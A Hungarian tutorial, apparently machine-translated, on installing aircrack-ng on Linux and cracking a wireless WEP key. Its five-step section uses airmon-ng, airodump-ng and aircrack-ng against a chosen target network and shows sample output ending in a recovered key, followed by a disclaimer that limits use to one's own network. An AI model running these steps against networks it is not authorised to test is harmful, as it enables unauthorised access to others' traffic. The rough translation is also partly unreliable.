hogyan lehet feltörni egy vezeték nélküli WEP kulcsot az AIR Crack

ez a cikk röviden ismerteti a vezeték nélküli WEP kulcs feltörésének egyszerű lépéseit az aircrack-ng szoftver segítségével. Ez megtehető egy vezeték nélküli hálózat szimatolásával, titkosított csomagok rögzítésével és megfelelő titkosítási feltörő program futtatásával a rögzített adatok visszafejtése érdekében. A WEP-t (Wired Equivalent Privacy ) meglehetősen könnyű feltörni, mivel csak egy kulcsot használ az összes forgalom titkosításához.

az alapelv az, hogy a hálózat két csomópontja közötti kommunikáció a MAC-címen alapul. Minden gazdagép csak a saját interfészének MAC-címére szánt csomagokat fogad. Ugyanez az elv vonatkozik a vezeték nélküli hálózatokra is. Ha azonban az egyik csomópont a saját hálózati kártyáját ígéretes módba állítja, akkor olyan csomagokat is kap, amelyek nem a saját MAC-címéhez vannak címezve.

a WEP kulcs feltöréséhez a hackernek el kell ragadnia a nem a saját hálózati interfészére szánt mintacsomagokat, és futtatnia kell a crack programot, hogy összehasonlítsa a tesztkulcsokat a rögzített csomagokkal csomagolt WEP kulcsokkal a dekódolás megkísérlése érdekében. A rögzített csomagok visszafejtésére alkalmas kulcs az a kulcs, amelyet a vezeték nélküli hálózat használ a teljes vezeték nélküli kommunikáció titkosításához a csatlakoztatott állomásokkal.

a következő szakaszokban végigvezetjük Önt az aircrack-ng telepítésén Linuxon, majd lépésről lépésre bemutatjuk a vezeték nélküli WEP kulcs feltörését. Az útmutató feltételezi, hogy a vezeték nélküli hálózati kártya telepítve van, és támogatja a monitor módot.

ebben az oktatóanyagban megtudhatja:

  • hogyan kell telepíteni aircrack-ng a nagyobb Linux disztribúciók
  • hogyan kell feltörni a vezeték nélküli WEP kulcs segítségével aircrack-ng
hogyan lehet feltörni egy vezeték nélküli WEP kulcsot az aircrack-ng használatával

hogyan lehet feltörni egy vezeték nélküli WEP kulcsot az aircrack-ng használatával

szoftverkövetelmények és Linux parancssori konvenciók
Kategória követelmények, konvenciók vagy használt szoftververzió
rendszer bármely Linux disztró
szoftver aircrack-ng
Egyéb privilegizált hozzáférés a Linux rendszerhez rootként vagy a sudo paranccsal.
konvenciók # – a megadott linux parancsokat root jogosultságokkal kell végrehajtani, akár közvetlenül root felhasználóként, akár a sudo parancs
$ használatával-a megadott linux parancsokat rendszeres, nem privilegizált felhasználóként kell végrehajtani

telepítse az aircrack-ng-t a főbb Linux disztribúciókra

a kezdéshez szüksége lesz a rendszerére telepített aircrack-ng szoftverre. Az alábbi megfelelő paranccsal telepítheti a programot a rendszer csomagkezelőjével.

az aircrack-ng telepítése Ubuntu, Debian és Linux Mint rendszerre:

$ sudo apt install aircrack-ng

az aircrack-ng telepítése CentOS, Fedora, AlmaLinux és Red Hat rendszerekre:

$ sudo dnf install aircrack-ng

az aircrack-ng telepítése Arch Linuxra és Manjaróra:

$ sudo pacman -S aircrack-ng

Crack vezeték nélküli WEP kulcs

  1. először meg kell határoznunk a vezeték nélküli hálózati interfész nevét. Ha a vezeték nélküli hálózati kártya megfelelően van telepítve, egy iwconfig parancs felfedi a vezeték nélküli hálózati interfész nevét:
    $ iwconfigwlan0 IEEE 802.11 Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dBm

    a kimenet azt mutatja, hogy esetünkben az interfész neve wlan0.

  2. Ezután kapcsolja be a vezeték nélküli interfész monitor módját.
    # airmon-ng start wlan0Interface Chipset Driverwlan0 rtl8180 - (monitor mode enabled on mon0)

    a parancs eredménye megadja az új virtuális felület nevét. Ez általában mon0.

  3. kiírja a monitor eredményeit egy terminálra, így láthatja őket.
    # airodump-ng mon0

    az Ön területén található vezeték nélküli hálózatokra vonatkozó adatok táblázata látható. Csak a feltörni kívánt hálózatra vonatkozó információkra van szüksége. Keresse meg, és jegyezze fel a BSSID-t és a csatornát, amelyen van.

  4. ezután naplózni fogja a vizsgálat eredményeit egy fájlba. Erre a rögzítési naplóra az Aircracknek szüksége lesz, hogy később brute force támadást indítson a hálózat ellen. A rögzítéshez ugyanazt a parancsot kell futtatnia, mint korábban, de meg kell adnia a BSSID-t, a csatornát és a napló helyét.
    # airodump-ng -c 1 --bssid XX:XX:XX:XX:XX:XX -w Documents/logs/wep-crack mon0

    töltse ki a tényleges adatokat a parancs futtatása előtt, majd hagyja futni.

  5. utolsó lépésként feltörjük a WEP kulcsot a rögzített csomagok és az aircrack-ng parancs használatával. Az összes rögzített csomag most wep-crack-01.cap fájlban van tárolva.
    # aircrack-ng -z wep-crack-01.cap

    a kimenetnek valahogy így kell kinéznie:

    Opening wep-crack-01.capRead 450 packets. # BSSID ESSID Encryption 1 00:11:95:9F:FD:F4 linuxconfig.org WEP (210 IVs) 2 00:17:3F:65:2E:5A belkin54g None (0.0.0.0)Index number of target network ?1 Aircrack-ng 1.0 rc1 Tested 485 keys (got 16690 IVs) KB depth byte(vote) 0 9/ 13 00(20992) 06(20736) 27(20736) 3F(20736) A2(20736) 1 0/ 1 F3(28416) A8(23296) 34(21248) 57(21248) A3(21248) 2 0/ 2 8E(25856) BC(23808) 3F(23040) D2(22784) 69(21504) 3 0/ 5 6E(24320) 35(22528) 5A(22016) 95(22016) B8(22016) 4 3/ 4 98(21504) 7C(20992) 84(20992) E0(20992) F0(20992) KEY FOUND! Decrypted correctly: 100%
aircrack-ng megpróbálja feltörni a WEP kulcsot Linuxon

aircrack-ng megpróbálja feltörni a WEP kulcsot Linuxon

záró gondolatok

ebben az útmutatóban láttuk, hogyan kell telepíteni az aircrack-ng-t Linuxra, és a szoftver segítségével feltörni egy vezeték nélküli WEP kulcsot. Ne feledje, hogy ezt a folyamatot csak a saját biztonságának tesztelésére vagy oktatási célokra szabad használni. Valaki más hálózatán való használata illegális.

Leave a Reply

Vélemény, hozzászólás?

Az e-mail-címet nem tesszük közzé.